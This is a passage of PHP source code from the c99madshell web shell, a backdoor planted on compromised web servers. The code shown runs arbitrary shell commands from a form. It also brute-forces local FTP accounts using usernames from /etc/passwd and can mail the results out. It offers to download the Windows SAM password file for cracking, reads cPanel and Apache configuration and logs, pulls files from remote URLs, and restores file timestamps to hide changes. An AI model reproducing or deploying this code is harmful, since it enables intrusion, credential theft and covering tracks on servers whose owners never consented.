       while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) {$f .= join ("\r\n",$row);}
       if (empty($f)) {echo "<b>File \"".$sql_getfile."\" does not exists or empty!</b><br>";}
       else {echo "<b>File \"".$sql_getfile."\":</b><br>".nl2br(htmlspecialchars($f))."<br>";}
       mysql_free_result($result);
       mysql_query("DROP TABLE tmp_file;");
      }
     }
     mysql_drop_db($tmpdb); //comment it if you want to leave database
    }
   }
  }
 }
 echo "</td></tr></table>";
 if ($sql_sock)
 {
  $affected = @mysql_affected_rows($sql_sock);
  if ((!is_numeric($affected)) or ($affected < 0)){$affected = 0;}
  echo "<tr><td><center><b>Affected rows: ".$affected."</center></td></tr>";
 }
 echo "</table>";
}
if ($act == "mkdir")
{
 if ($mkdir != $d)
 {
  if (file_exists($mkdir)) {echo "<b>Make Dir \"".htmlspecialchars($mkdir)."\"</b>: object alredy exists";}
  elseif (!mkdir($mkdir)) {echo "<b>Make Dir \"".htmlspecialchars($mkdir)."\"</b>: access denied";}
  echo "<br><br>";
 }
 $act = $dspact = "ls";
}
if ($act == "ftpquickbrute")
{
 echo "<b>Ftp Quick brute:</b><br>";
 if (!win) {echo "This functions not work in Windows!<br><br>";}
 else
 {
  function c99ftpbrutecheck($host,$port,$timeout,$login,$pass,$sh,$fqb_onlywithsh)
  {
   if ($fqb_onlywithsh) {$TRUE = (!in_array($sh,array("/bin/FALSE","/sbin/nologin")));}
   else {$TRUE = TRUE;}
   if ($TRUE)
   {
    $sock = @ftp_connect($host,$port,$timeout);
    if (@ftp_login($sock,$login,$pass))
    {
     echo "<a href=\"ftp://".$login.":".$pass."@".$host."\" target=\"_blank\"><b>Connected to ".$host." with login \"".$login."\" and password \"".$pass."\"</b></a>.<br>";
     ob_flush();
     return TRUE;
    }
   }
  }
  if (!empty($submit))
  {
   if (isset($_POST['fqb_lenght'])) $fqb_lenght = $_POST['fqb_lenght'];
   if (!is_numeric($fqb_lenght)) {$fqb_lenght = $nixpwdperpage;}
   $fp = fopen("/etc/passwd","r");
   if (!$fp) {echo "Can't get /etc/passwd for password-list.";}
   else
   {
    if (isset($_POST['fqb_logging'])) $fqb_logging = $_POST['fqb_logging'];
    if ($fqb_logging)
    {
     if (isset($_POST['fqb_logfile'])) $fqb_logging = $_POST['fqb_logfile'];
     if ($fqb_logfile) {$fqb_logfp = fopen($fqb_logfile,"w");}
     else {$fqb_logfp = FALSE;}
     $fqb_log = "FTP Quick Brute (called c99madshell v. ".$shver.") started at ".date("d.m.Y H:i:s")."\r\n\r\n";
     if ($fqb_logfile) {fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));}
    }
    ob_flush();
    $i = $success = 0;
    $ftpquick_st = getmicrotime();
    while(!feof($fp))
    {
     $str = explode(":",fgets($fp,2048));
     if (c99ftpbrutecheck("localhost",21,1,$str[0],$str[0],$str[6],$fqb_onlywithsh))
     {
      echo "<b>Connected to ".getenv("SERVER_NAME")." with login \"".$str[0]."\" and password \"".$str[0]."\"</b><br>";
      $fqb_log .= "Connected to ".getenv("SERVER_NAME")." with login \"".$str[0]."\" and password \"".$str[0]."\", at ".date("d.m.Y H:i:s")."\r\n";
      if ($fqb_logfp) {fseek($fqb_logfp,0); fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));}
      $success++;
      ob_flush();
     }
     if ($i > $fqb_lenght) {break;}
     $i++;
    }
    if ($success == 0) {echo "No success. connections!"; $fqb_log .= "No success. connections!\r\n";}
    $ftpquick_t = round(getmicrotime()-$ftpquick_st,4);
    echo "<hr size=\"1\" noshade><b>Done!</b><br>Total time (secs.): ".$ftpquick_t."<br>Total connections: ".$i."<br>Success.: <font color=green><b>".$success."</b></font><br>Unsuccess.:".($i-$success)."</b><br>Connects per second: ".round($i/$ftpquick_t,2)."<br>";
    $fqb_log .= "\r\n------------------------------------------\r\nDone!\r\nTotal time (secs.): ".$ftpquick_t."\r\nTotal connections: ".$i."\r\nSuccess.: ".$success."\r\nUnsuccess.:".($i-$success)."\r\nConnects per second: ".round($i/$ftpquick_t,2)."\r\n";
    if ($fqb_logfp) {fseek($fqb_logfp,0); fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));}
    if ($fqb_logemail) {@mail($fqb_logemail,"c99shell v. ".$shver." report",$fqb_log);}
    fclose($fqb_logfp);
   }
  }
  else
  {
   $logfile = $tmpdir_logs."c99sh_ftpquickbrute_".date("d.m.Y_H_i_s").".log";
   $logfile = str_replace("//",DIRECTORY_SEPARATOR,$logfile);
   echo "<form method=\"POST\"><input type=hidden name=act value=\"ftpquickbrute\"><br>Read first: <input type=text name=\"fqb_lenght\" value=\"".$nixpwdperpage."\"><br><br>Users only with shell?&nbsp;<input type=\"checkbox\" name=\"fqb_onlywithsh\" value=\"1\"><br><br>Logging?&nbsp;<input type=\"checkbox\" name=\"fqb_logging\" value=\"1\" checked><br>Logging to file?&nbsp;<input type=\"text\" name=\"fqb_logfile\" value=\"".$logfile."\" size=\"".(strlen($logfile)+2*(strlen($logfile)/10))."\"><br>Logging to e-mail?&nbsp;<input type=\"text\" name=\"fqb_logemail\" value=\"".$log_email."\" size=\"".(strlen($logemail)+2*(strlen($logemail)/10))."\"><br><br><input type=submit name=submit value=\"Brute\"></form>";
  }
 }
}
if ($act == "d")
{
 if (!is_dir($d)) {echo "<center><b>Permision denied!</b></center>";}
 else
 {
  echo "<b>Directory information:</b><table border=0 cellspacing=1 cellpadding=2>";
  if (!$win)
  {
   echo "<tr><td><b>Owner/Group</b></td><td> ";
   $ow = posix_getpwuid(fileowner($d));
   $gr = posix_getgrgid(filegroup($d));
   $row[] = ($ow["name"]?$ow["name"]:fileowner($d))."/".($gr["name"]?$gr["name"]:filegroup($d));
  }
  echo "<tr><td><b>Perms</b></td><td><a href=\"#\" onclick=\"document.todo.act.value='chmod';document.todo.d.value='".urlencode($d)."';document.todo.submit();\"><b>".view_perms_color($d)."</b></a><tr><td><b>Create time</b></td><td> ".date("d/m/Y H:i:s",filectime($d))."</td></tr><tr><td><b>Access time</b></td><td> ".date("d/m/Y H:i:s",fileatime($d))."</td></tr><tr><td><b>MODIFY time</b></td><td> ".date("d/m/Y H:i:s",filemtime($d))."</td></tr></table><br>";
 }
}
if ($act == "phpinfo") {@ob_clean(); phpinfo(); c99shexit();}
if ($act == "security")
{
 echo "<center><b>Server security information:</b></center><b>Open base dir: ".$hopenbasedir."</b><br>";
 if (!$win)
 {
  if ($nixpasswd)
  {
   if ($nixpasswd == 1) {$nixpasswd = 0;}
   echo "<b>*nix /etc/passwd:</b><br>";
   if (!is_numeric($nixpwd_s)) {$nixpwd_s = 0;}
   if (!is_numeric($nixpwd_e)) {$nixpwd_e = $nixpwdperpage;}
   echo "<form method=\"POST\"><input type=hidden name=act value=\"security\"><input type=hidden name=\"nixpasswd\" value=\"1\"><b>From:</b>&nbsp;<input type=\"text=\" name=\"nixpwd_s\" value=\"".$nixpwd_s."\">&nbsp;<b>To:</b>&nbsp;<input type=\"text\" name=\"nixpwd_e\" value=\"".$nixpwd_e."\">&nbsp;<input type=submit value=\"View\"></form><br>";
   $i = $nixpwd_s;
   while ($i < $nixpwd_e)
   {
    $uid = posix_getpwuid($i);
    if ($uid)
    {
     $uid["dir"] = "<a href=\"#\" onclick=\"document.todo.act.value='ls';document.todo.d.value='".urlencode($uid["dir"])."';document.todo.submit();\">".$uid["dir"]."</a>";
     echo join(":",$uid)."<br>";
    }
    $i++;
   }
  }
  else {echo "<br><a href=\"#\" onclick=\"document.todo.act.value='security';document.todo.d.value='".$ud."';document.todo.nixpasswd.value='1';document.todo.submit();\"><b><u>Get /etc/passwd</u></b></a><br>";}
 }
 else
 {
  $v = $_SERVER["WINDIR"]."\repair\sam";
  if (file_get_contents($v)) {echo "<b><font color=red>You can't crack winnt passwords(".$v.") </font></b><br>";}
  else {echo "<b><font color=green>You can crack winnt passwords. <a href=\"#\" onclick=\"document.todo.act.value='f';document.todo.f.value='sam';document.todo.d.value='".$_SERVER["WINDIR"]."\/repair';document.todo.ft.value='download';document.todo.submit();\"><u><b>Download</b></u></a>, and use lcp.crack+ ©.</font></b><br>";}
 }
 if (file_get_contents("/etc/userdomains")) {echo "<b><font color=green><a href=\"#\" onclick=\"document.todo.act.value='f';document.todo.f.value='userdomains';document.todo.d.value='".urlencode("/etc")."';document.todo.ft.value='txt';document.todo.submit();\"><u><b>View cpanel user-domains logs</b></u></a></font></b><br>";}
 if (file_get_contents("/var/cpanel/accounting.log")) {echo "<b><font color=green><a href=\"#\" onclick=\"document.todo.act.value='f';document.todo.f.value='accounting.log';document.todo.d.value='".urlencode("/var/cpanel/")."';document.todo.ft.value='txt';document.todo.submit();\"><u><b>View cpanel logs</b></u></a></font></b><br>";}
 if (file_get_contents("/usr/local/apache/conf/httpd.conf")) {echo "<b><font color=green><a href=\"#\" onclick=\"document.todo.act.value='f';document.todo.f.value='httpd.conf';document.todo.d.value='".urlencode("/usr/local/apache/conf")."';document.todo.ft.value='txt';document.todo.submit();\"><u><b>Apache configuration (httpd.conf)</b></u></a></font></b><br>";}
 if (file_get_contents("/etc/httpd.conf")) {echo "<b><font color=green><a href=\"#\" onclick=\"document.todo.act.value='f';document.todo.f.value='httpd.conf';document.todo.d.value='".urlencode("/etc")."';document.todo.ft.value='txt';document.todo.submit();\"><u><b>Apache configuration (httpd.conf)</b></u></a></font></b><br>";}
 if (file_get_contents("/etc/syslog.conf")) {echo "<b><font color=green><a href=\"#\" onclick=\"document.todo.act.value='f';document.todo.f.value='syslog.conf';document.todo.d.value='".urlencode("/etc")."';document.todo.ft.value='txt';document.todo.submit();\"><u><b>Syslog configuration (syslog.conf)</b></u></a></font></b><br>";}
 if (file_get_contents("/etc/motd")) {echo "<b><font color=green><a href=\"#\" onclick=\"document.todo.act.value='f';document.todo.f.value='motd';document.todo.d.value='".urlencode("/etc")."';document.todo.ft.value='txt';document.todo.submit();\"><u><b>Message Of The Day</b></u></a></font></b><br>";}
 if (file_get_contents("/etc/hosts")) {echo "<b><font color=green><a href=\"#\" onclick=\"document.todo.act.value='f';document.todo.f.value='hosts';document.todo.d.value='".urlencode("/etc")."';document.todo.ft.value='txt';document.todo.submit();\"><u><b>Hosts</b></u></a></font></b><br>";}
 function displaysecinfo($name,$value) {if (!empty($value)) {if (!empty($name)) {$name = "<b>".$name." - </b>";} echo $name.nl2br($value)."<br>";}}
 displaysecinfo("OS Version?",myshellexec("cat /proc/version"));
 displaysecinfo("Kernel version?",myshellexec("sysctl -a | grep version"));
 displaysecinfo("Distrib name",myshellexec("cat /etc/issue.net"));
 displaysecinfo("Distrib name (2)",myshellexec("cat /etc/*-realise"));
 displaysecinfo("CPU?",myshellexec("cat /proc/cpuinfo"));
 displaysecinfo("RAM",myshellexec("free -m"));
 displaysecinfo("HDD space",myshellexec("df -h"));
 displaysecinfo("List of Attributes",myshellexec("lsattr -a"));
 displaysecinfo("Mount options ",myshellexec("cat /etc/fstab"));
 displaysecinfo("Is cURL installed?",myshellexec("which curl"));
 displaysecinfo("Is lynx installed?",myshellexec("which lynx"));
 displaysecinfo("Is links installed?",myshellexec("which links"));
 displaysecinfo("Is fetch installed?",myshellexec("which fetch"));
 displaysecinfo("Is GET installed?",myshellexec("which GET"));
 displaysecinfo("Is perl installed?",myshellexec("which perl"));
 displaysecinfo("Where is apache",myshellexec("whereis apache"));
 displaysecinfo("Where is perl?",myshellexec("whereis perl"));
 displaysecinfo("locate proftpd.conf",myshellexec("locate proftpd.conf"));
 displaysecinfo("locate httpd.conf",myshellexec("locate httpd.conf"));
 displaysecinfo("locate my.conf",myshellexec("locate my.conf"));
 displaysecinfo("locate psybnc.conf",myshellexec("locate psybnc.conf"));
}
if ($act == "mkfile")
{
 if ($mkfile != $d)
 {
  if (file_exists($mkfile)) {echo "<b>Make File \"".htmlspecialchars($mkfile)."\"</b>: object alredy exists";}
  elseif (!fopen($mkfile,"w")) {echo "<b>Make File \"".htmlspecialchars($mkfile)."\"</b>: access denied";}
  else {$act = "f"; $d = dirname($mkfile); if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} $f = basename($mkfile);}
 }
 else {$act = $dspact = "ls";}
}
if ($act == "fsbuff")
{
 $arr_copy = $sess_data["copy"];
 $arr_cut = $sess_data["cut"];
 $arr = array_merge($arr_copy,$arr_cut);
 if (count($arr) == 0) {echo "<center><b>Buffer is empty!</b></center>";}
 else {echo "<b>File-System buffer</b><br><br>"; $ls_arr = $arr; $disp_fullpath = TRUE; $act = "ls";}
}
if ($act == "selfremove")
{
 if (($submit == $rndcode) and ($submit != ""))
 {
  if (unlink(__FILE__)) {@ob_clean(); echo "Thanks for using c99madshell v.".$shver."!"; c99shexit(); }
  else {echo "<center><b>Can't delete ".__FILE__."!</b></center>";}
 }
 else
 {
  if (!empty($rndcode)) {echo "<b>Error: incorrect confimation!</b>";}
  $rnd = rand(0,9).rand(0,9).rand(0,9);
  echo "<form method=\"POST\"><input type=hidden name=act value=selfremove><b>Self-remove: ".__FILE__." <br><b>Are you sure?<br>For confirmation, enter \"".$rnd."\"</b>:&nbsp;<input type=hidden name=rndcode value=\"".$rnd."\"><input type=text name=submit>&nbsp;<input type=submit value=\"YES\"></form>";
 }
}
if ($act == "search")
{
 echo "<b>Search in file-system:</b><br>";
 if (empty($search_in)) {$search_in = $d;}
 if (empty($search_name)) {$search_name = "(.*)"; $search_name_regexp = 1;}
 if (empty($search_text_wwo)) {$search_text_regexp = 0;}
 if (!empty($submit))
 {
  $found = array();
  $found_d = 0;
  $found_f = 0;
  $search_i_f = 0;
  $search_i_d = 0;
  $a = array
  (
   "name"=>$search_name, "name_regexp"=>$search_name_regexp,
   "text"=>$search_text, "text_regexp"=>$search_text_regxp,
   "text_wwo"=>$search_text_wwo,
   "text_cs"=>$search_text_cs,
   "text_not"=>$search_text_not
  );
  $searchtime = getmicrotime();
  $in = array_unique(explode(";",$search_in));
  foreach($in as $v) {c99fsearch($v);}
  $searchtime = round(getmicrotime()-$searchtime,4);
  if (count($found) == 0) {echo "<b>No files found!</b>";}
  else
  {
   $ls_arr = $found;
   $disp_fullpath = TRUE;
   $act = "ls";
  }
 }
 echo "<form method=POST>
 
<input type=hidden name=\"d\" value=\"".$dispd."\"><input type=hidden name=act value=\"".$dspact."\">
<b>Search for (file/folder name): </b><input type=\"text\" name=\"search_name\" size=\"".round(strlen($search_name)+25)."\" value=\"".htmlspecialchars($search_name)."\">&nbsp;<input type=\"checkbox\" name=\"search_name_regexp\" value=\"1\" ".($search_name_regexp == 1?" checked":"")."> - regexp
<br><b>Search in (explode \";\"): </b><input type=\"text\" name=\"search_in\" size=\"".round(strlen($search_in)+25)."\" value=\"".htmlspecialchars($search_in)."\">
<br><br><b>Text:</b><br><textarea name=\"search_text\" cols=\"122\" rows=\"10\">".htmlspecialchars($search_text)."</textarea>
<br><br><input type=\"checkbox\" name=\"search_text_regexp\" value=\"1\" ".($search_text_regexp == 1?" checked":"")."> - regexp
&nbsp;&nbsp;<input type=\"checkbox\" name=\"search_text_wwo\" value=\"1\" ".($search_text_wwo == 1?" checked":"")."> - <u>w</u>hole words only
&nbsp;&nbsp;<input type=\"checkbox\" name=\"search_text_cs\" value=\"1\" ".($search_text_cs == 1?" checked":"")."> - cas<u>e</u> sensitive
 
&nbsp;&nbsp;<input type=\"checkbox\" name=\"search_text_not\" value=\"1\" ".($search_text_not == 1?" checked":"")."> - find files <u>NOT</u> containing the text
<br><br><input type=submit name=submit value=\"Search\"></form>";
 if ($act == "ls") {$dspact = $act; echo "<hr size=\"1\" noshade><b>Search took ".$searchtime." secs (".$search_i_f." files and ".$search_i_d." folders, ".round(($search_i_f+$search_i_d)/$searchtime,4)." objects per second).</b><br><br>";}
}
if ($act == "chmod")
{
 $mode = fileperms($d.$f);
 if (!$mode) {echo "<b>Change file-mode with error:</b> can't get current value.";}
 else
 {
  $form = TRUE;
  if ($chmod_submit)
  {
   $octet = "0".base_convert(($chmod_o["r"]?1:0).($chmod_o["w"]?1:0).($chmod_o["x"]?1:0).($chmod_g["r"]?1:0).($chmod_g["w"]?1:0).($chmod_g["x"]?1:0).($chmod_w["r"]?1:0).($chmod_w["w"]?1:0).($chmod_w["x"]?1:0),2,8);
   if (chmod($d.$f,$octet)) {$act = "ls"; $form = FALSE; $err = "";}
   else {$err = "Can't chmod to ".$octet.".";}
  }
  if ($form)
  {
   $perms = parse_perms($mode);
   echo "<b>Changing file-mode (".$d.$f."), ".view_perms_color($d.$f)." (".substr(decoct(fileperms($d.$f)),-4,4).")</b><br>".($err?"<b>Error:</b> ".$err:"")."<form action=\"".$surl."\" method=POST><input type=hidden name=d value=\"".htmlspecialchars($d)."\"><input type=hidden name=f value=\"".htmlspecialchars($f)."\"><input type=hidden name=act value=chmod><table align=left width=300 border=0 cellspacing=0 cellpadding=5><tr><td><b>Owner</b><br><br><input type=checkbox NAME=chmod_o[r] value=1".($perms["o"]["r"]?" checked":"").">&nbsp;Read<br><input type=checkbox name=chmod_o[w] value=1".($perms["o"]["w"]?" checked":"").">&nbsp;Write<br><input type=checkbox NAME=chmod_o[x] value=1".($perms["o"]["x"]?" checked":"").">eXecute</td><td><b>Group</b><br><br><input type=checkbox NAME=chmod_g[r] value=1".($perms["g"]["r"]?" checked":"").">&nbsp;Read<br><input type=checkbox NAME=chmod_g[w] value=1".($perms["g"]["w"]?" checked":"").">&nbsp;Write<br><input type=checkbox NAME=chmod_g[x] value=1".($perms["g"]["x"]?" checked":"").">eXecute</font></td><td><b>World</b><br><br><input type=checkbox NAME=chmod_w[r] value=1".($perms["w"]["r"]?" checked":"").">&nbsp;Read<br><input type=checkbox NAME=chmod_w[w] value=1".($perms["w"]["w"]?" checked":"").">&nbsp;Write<br><input type=checkbox NAME=chmod_w[x] value=1".($perms["w"]["x"]?" checked":"").">eXecute</font></td></tr><tr><td><input type=submit name=chmod_submit value=\"Save\"></td></tr></table></form>";
  }
 }
}
if ($act == "upload")
{
 $uploadmess = "";
 $uploadpath = str_replace("\\",DIRECTORY_SEPARATOR,$uploadpath);
 if (empty($uploadpath)) {$uploadpath = $d;}
 elseif (substr($uploadpath,-1) != "/") {$uploadpath .= "/";}
 if (!empty($submit))
 {
  global $HTTP_POST_FILES;
  $uploadfile = $HTTP_POST_FILES["uploadfile"];
  if (!empty($uploadfile["tmp_name"]))
  {
   if (empty($uploadfilename)) {$destin = $uploadfile["name"];}
   else {$destin = $userfilename;}
   if (!move_uploaded_file($uploadfile["tmp_name"],$uploadpath.$destin)) {$uploadmess .= "Error uploading file ".$uploadfile["name"]." (can't copy \"".$uploadfile["tmp_name"]."\" to \"".$uploadpath.$destin."\"!<br>";}
  }
  elseif (!empty($uploadurl))
  {
   if (!empty($uploadfilename)) {$destin = $uploadfilename;}
   else
   {
    $destin = explode("/",$destin);
    $destin = $destin[count($destin)-1];
    if (empty($destin))
    {
     $i = 0;
     $b = "";
     while(file_exists($uploadpath.$destin)) {if ($i > 0) {$b = "_".$i;} $destin = "index".$b.".html"; $i++;}}
   }
   if ((!eregi("http://",$uploadurl)) and (!eregi("https://",$uploadurl)) and (!eregi("ftp://",$uploadurl))) {echo "<b>Incorect url!</b><br>";}
   else
   {
    $st = getmicrotime();
    $content = @file_get_contents($uploadurl);
    $dt = round(getmicrotime()-$st,4);
    if (!$content) {$uploadmess .=  "Can't download file!<br>";}
    else
    {
     if ($filestealth) {$stat = stat($uploadpath.$destin);}
     $fp = fopen($uploadpath.$destin,"w");
     if (!$fp) {$uploadmess .= "Error writing to file ".htmlspecialchars($destin)."!<br>";}
     else
     {
      fwrite($fp,$content,strlen($content));
      fclose($fp);
      if ($filestealth) {touch($uploadpath.$destin,$stat[9],$stat[8]);}
     }
    }
   }
  }
 }
 if ($miniform)
 {
  echo "<b>".$uploadmess."</b>";
  $act = "ls";
 }
 else
 {
  echo "<b>File upload:</b><br><b>".$uploadmess."</b><form enctype=\"multipart/form-data\" method=POST><input type=\"hidden\" name=\"act\" value=\"upload\"><input type=\"hidden\" name=\"d\" value=\"".urlencode($d)."\">
 
Select file on your local computer: <input name=\"uploadfile\" type=\"file\"><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;or<br>
Input URL: <input name=\"uploadurl\" type=\"text\" value=\"".htmlspecialchars($uploadurl)."\" size=\"70\"><br><br>
Save this file dir: <input name=\"uploadpath\" size=\"70\" value=\"".$dispd."\"><br><br>
File-name (auto-fill): <input name=uploadfilename size=25><br><br>
<input type=checkbox name=uploadautoname value=1 id=df4>&nbsp;convert file name to lovercase<br><br>
<input type=submit name=submit value=\"Upload\">
</form>";
 }
}
if ($act == "delete")
{
 $delerr = "";
 foreach ($actbox as $v)
 {
  $result = FALSE;
  $result = fs_rmobj($v);
  if (!$result) {$delerr .= "Can't delete ".htmlspecialchars($v)."<br>";}
 }
 if (!empty($delerr)) {echo "<b>Deleting with errors:</b><br>".$delerr;}
 $act = "ls";
}
if (!$usefsbuff)
{
 if (($act == "paste") or ($act == "copy") or ($act == "cut") or ($act == "unselect")) {echo "<center><b>Sorry, buffer is disabled. For enable, set directive \"\$useFSbuff\" as TRUE.</center>";}
}
else
{
 if ($act == "copy") {$err = ""; $sess_data["copy"] = array_merge($sess_data["copy"],$actbox); c99_sess_put($sess_data); $act = "ls"; }
 elseif ($act == "cut") {$sess_data["cut"] = array_merge($sess_data["cut"],$actbox); c99_sess_put($sess_data); $act = "ls";}
 elseif ($act == "unselect") {foreach ($sess_data["copy"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["copy"][$k]);}} foreach ($sess_data["cut"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["cut"][$k]);}} c99_sess_put($sess_data); $act = "ls";}
 if ($actemptybuff) {$sess_data["copy"] = $sess_data["cut"] = array(); c99_sess_put($sess_data);}
 elseif ($actpastebuff)
 {
  $psterr = "";
  foreach($sess_data["copy"] as $k=>$v)
  {
   $to = $d.basename($v);
   if (!fs_copy_obj($v,$to)) {$psterr .= "Can't copy ".$v." to ".$to."!<br>";}
   if ($copy_unset) {unset($sess_data["copy"][$k]);}
  }
  foreach($sess_data["cut"] as $k=>$v)
  {
   $to = $d.basename($v);
   if (!fs_move_obj($v,$to)) {$psterr .= "Can't move ".$v." to ".$to."!<br>";}
   unset($sess_data["cut"][$k]);
  }
  c99_sess_put($sess_data);
  if (!empty($psterr)) {echo "<b>Pasting with errors:</b><br>".$psterr;}
  $act = "ls";
 }
 elseif ($actarcbuff)
 {
  $arcerr = "";
  if (substr($actarcbuff_path,-7,7) == ".tar.gz") {$ext = ".tar.gz";}
  else {$ext = ".tar.gz";}
  if ($ext == ".tar.gz") {$cmdline = "tar cfzv";}
  $cmdline .= " ".$actarcbuff_path;
  $objects = array_merge($sess_data["copy"],$sess_data["cut"]);
  foreach($objects as $v)
  {
   $v = str_replace("\\",DIRECTORY_SEPARATOR,$v);
   if (substr($v,0,strlen($d)) == $d) {$v = basename($v);}
   if (is_dir($v))
   {
    if (substr($v,-1) != DIRECTORY_SEPARATOR) {$v .= DIRECTORY_SEPARATOR;}
    $v .= "*";
   }
   $cmdline .= " ".$v;
  }
  $tmp = realpath(".");
  chdir($d);
  $ret = myshellexec($cmdline);
  chdir($tmp);
  if (empty($ret)) {$arcerr .= "Can't call archivator (".htmlspecialchars(str2mini($cmdline,60)).")!<br>";}
  $ret = str_replace("\r\n","\n",$ret);
  $ret = explode("\n",$ret);
  if ($copy_unset) {foreach($sess_data["copy"] as $k=>$v) {unset($sess_data["copy"][$k]);}}
  foreach($sess_data["cut"] as $k=>$v)
  {
   if (in_array($v,$ret)) {fs_rmobj($v);}
   unset($sess_data["cut"][$k]);
  }
  c99_sess_put($sess_data);
  if (!empty($arcerr)) {echo "<b>Archivation errors:</b><br>".$arcerr;}
  $act = "ls";
 }
 elseif ($actpastebuff)
 {
  $psterr = "";
  foreach($sess_data["copy"] as $k=>$v)
  {
   $to = $d.basename($v);
   if (!fs_copy_obj($v,$d)) {$psterr .= "Can't copy ".$v." to ".$to."!<br>";}
   if ($copy_unset) {unset($sess_data["copy"][$k]);}
  }
  foreach($sess_data["cut"] as $k=>$v)
  {
   $to = $d.basename($v);
   if (!fs_move_obj($v,$d)) {$psterr .= "Can't move ".$v." to ".$to."!<br>";}
   unset($sess_data["cut"][$k]);
  }
  c99_sess_put($sess_data);
  if (!empty($psterr)) {echo "<b>Pasting with errors:</b><br>".$psterr;}
  $act = "ls";
 }
}
if ($act == "cmd")
{
if (trim($cmd) == "ps -aux") {$act = "processes";}
elseif (trim($cmd) == "tasklist") {$act = "processes";}
else
{
 @chdir($chdir);
 if (!empty($submit))
 {
  echo "<b>Result of execution this command</b>:<br>";
  $olddir = realpath(".");
  @chdir($d);
  $ret = myshellexec($cmd);
  $ret = convert_cyr_string($ret,"d","w");
  if ($cmd_txt)
  {
   $rows = count(explode("\r\n",$ret))+1;
   if ($rows < 10) {$rows = 10;}
   echo "<br><textarea cols=\"122\" rows=\"".$rows."\" readonly>".htmlspecialchars($ret)."</textarea>";
  }
  else {echo $ret."<br>";}
  @chdir($olddir);
 }
 else {echo "<b>Execution command</b>"; if (empty($cmd_txt)) {$cmd_txt = TRUE;}}
 echo "<form method=POST><input type=hidden name=act value=cmd><textarea name=cmd cols=122 rows=10>".htmlspecialchars($cmd)."</textarea><input type=hidden name=\"d\" value=\"".$dispd."\"><br><br><input type=submit name=submit value=\"Execute\">&nbsp;Display in text-area&nbsp;<input type=\"checkbox\" name=\"cmd_txt\" value=\"1\""; if ($cmd_txt) {echo " checked";} echo "></form>";
}
}
if ($act == "ls")
{
 if (count($ls_arr) > 0) {$list = $ls_arr;}
 else
 {
  $list = array();
  if ($h = @opendir($d))
  {
   while (($o = readdir($h)) !== FALSE) {$list[] = $d.$o;}
   closedir($h);
  }
  else {}
 }
 if (count($list) == 0) {echo "<center><b>Can't open folder (".htmlspecialchars($d).")!</b></center>";}
 else
 {
  //Building array
  $objects = array();
  $vd = "f"; //Viewing mode
  if ($vd == "f")
  {
   $objects["head"] = array();
   $objects["folders"] = array();
   $objects["links"] = array();
   $objects["files"] = array();
   foreach ($list as $v)
   {
    $o = basename($v);
    $row = array();
    if ($o == ".") {$row[] = $d.$o; $row[] = "LINK";}
    elseif ($o == "..") {$row[] = $d.$o; $row[] = "LINK";}
    elseif (is_dir($v))
    {
     if (is_link($v)) {$type = "LINK";}
     else {$type = "DIR";}
     $row[] = $v;
     $row[] = $type;
    }
    elseif(is_file($v)) {$row[] = $v; $row[] = filesize($v);}
    $row[] = filemtime($v);
    if (!$win)
    {
     $ow = posix_getpwuid(fileowner($v));
     $gr = posix_getgrgid(filegroup($v));
     $row[] = ($ow["name"]?$ow["name"]:fileowner($v))."/".($gr["name"]?$gr["name"]:filegroup($v));
    }
    $row[] = fileperms($v);
    if (($o == ".") or ($o == "..")) {$objects["head"][] = $row;}
    elseif (is_link($v)) {$objects["links"][] = $row;}
    elseif (is_dir($v)) {$objects["folders"][] = $row;}
    elseif (is_file($v)) {$objects["files"][] = $row;}
    $i++;
   }
   $row = array();
   $row[] = "<b>Name</b>";
   $row[] = "<b>Size</b>";
   $row[] = "<b>Modify</b>";
   if (!$win)
  {$row[] = "<b>Owner/Group</b>";}
   $row[] = "<b>Perms</b>";
   $row[] = "<b>Action</b>";
   $parsesort = parsesort($sort);
   $sort = $parsesort[0].$parsesort[1];
   $k = $parsesort[0];
   if ($parsesort[1] != "a") {$parsesort[1] = "d";}
   $y = "<a href=\"#\" onclick=\"document.todo.act.value='".$dspact."';document.todo.d.value='".urlencode($d)."';document.todo.sort.value='".$k.($parsesort[1] == "a"?"d":"a").";document.todo.submit();\">";
   $row[$k] .= $y;
   for($i=0;$i<count($row)-1;$i++)
   {
    if ($i != $k) {$row[$i] = "<a href=\"#\" onclick=\"document.todo.act.value='".$dspact."';document.todo.d.value='".urlencode($d)."';document.todo.sort.value='".$i.$parsesort[1]."';document.todo.submit();\">".$row[$i]."</a>";}
   }
   $v = $parsesort[0];
   usort($objects["folders"], "tabsort");
   usort($objects["links"], "tabsort");
   usort($objects["files"], "tabsort");
   if ($parsesort[1] == "d")
   {
    $objects["folders"] = array_reverse($objects["folders"]);
    $objects["files"] = array_reverse($objects["files"]);
   }
   $objects = array_merge($objects["head"],$objects["folders"],$objects["links"],$objects["files"]);
   $tab = array();
   $tab["cols"] = array($row);
   $tab["head"] = array();
   $tab["folders"] = array();
   $tab["links"] = array();
   $tab["files"] = array();
   $i = 0;
   foreach ($objects as $a)
   {
    $v = $a[0];
    $o = basename($v);
    $dir = dirname($v);
    if ($disp_fullpath) {$disppath = $v;}
    else {$disppath = $o;}
    $disppath = str2mini($disppath,60);
    if (in_array($v,$sess_data["cut"])) {$disppath = "<strike>".$disppath."</strike>";}
    elseif (in_array($v,$sess_data["copy"])) {$disppath = "<u>".$disppath."</u>";}
    foreach ($regxp_highlight as $r)
    {
     if (ereg($r[0],$o))
     {
      if ((!is_numeric($r[1])) or ($r[1] > 3)) {$r[1] = 0; ob_clean(); echo "Warning! Configuration error in \$regxp_highlight[".$k."][0] - unknown command."; c99shexit();}
      else
      {
       $r[1] = round($r[1]);
       $isdir = is_dir($v);
       if (($r[1] == 0) or (($r[1] == 1) and !$isdir) or (($r[1] == 2) and !$isdir))
       {
        if (empty($r[2])) {$r[2] = "<b>"; $r[3] = "</b>";}
        $disppath = $r[2].$disppath.$r[3];
        if ($r[4]) {break;}
       }
      }
     }
    }
    $uo = urlencode($o);
    $ud = urlencode($dir);
    $uv = urlencode($v);
    $row = array();
    if ($o == ".")
    {
